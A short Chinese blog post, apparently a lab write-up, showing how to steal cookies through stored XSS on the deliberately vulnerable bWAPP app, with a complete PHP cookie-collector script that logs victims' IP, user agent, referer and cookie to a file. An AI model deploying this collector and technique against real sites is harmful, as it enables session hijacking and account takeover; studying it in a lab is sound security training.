bwapp之xss(blog)

存储型XSS，持久化，代码是存储在服务器中的，如在个人信息或发表文章等地方，加入代码，如果没有过滤或过滤不严，那么这些代码将储存到服务器中，用户访问该页面的时候触发代码执行。这种XSS比较危险，容易造成蠕虫，盗窃cookie等。

实验内容：通过存储型xss漏洞获取用户cookie

靶机：192.168.1.104（bwapp）

客户机：192.168.1.103（win7）

存放获取cookie脚本的服务器：192.1681.109（ubuntu）

获取cookie的php文件代码：

 <?php
 $ip = $_SERVER['REMOTE_ADDR'];
 $user_agent = $_SERVER['HTTP_USER_AGENT'];
 $referer = $_SERVER['HTTP_REFERER'];
 $cookie = $_GET['hack'];
 $content = "ip: ".$ip."\nuser_agent: ".$user_agent."\nreferer: ".$referer."\ncookie: ".$cookie."\n";
 $file = fopen("data.txt","a");
 fwrite($file,$content);
 fclose($file);
 header("location: http://www.baidu.com");
 ?>

访问靶机系统：http://192.168.1.104/bWAPP/xss_stored_1.php

输入payload

用户192.168.1.103将在访问这个页面的时候向服务器提交cookie

服务器收到请求后会在当前目录创建一个名为data.txt的文件，存放获取到的内容，其文件内容为：

现在我们已经获取到了cookie，接下来可以使用cookie访问用户登录之后才可以访问到的内容

本文固定链接：http://www.cnblogs.com/hell0w/p/7528926.html 转载请注明出处，谢谢！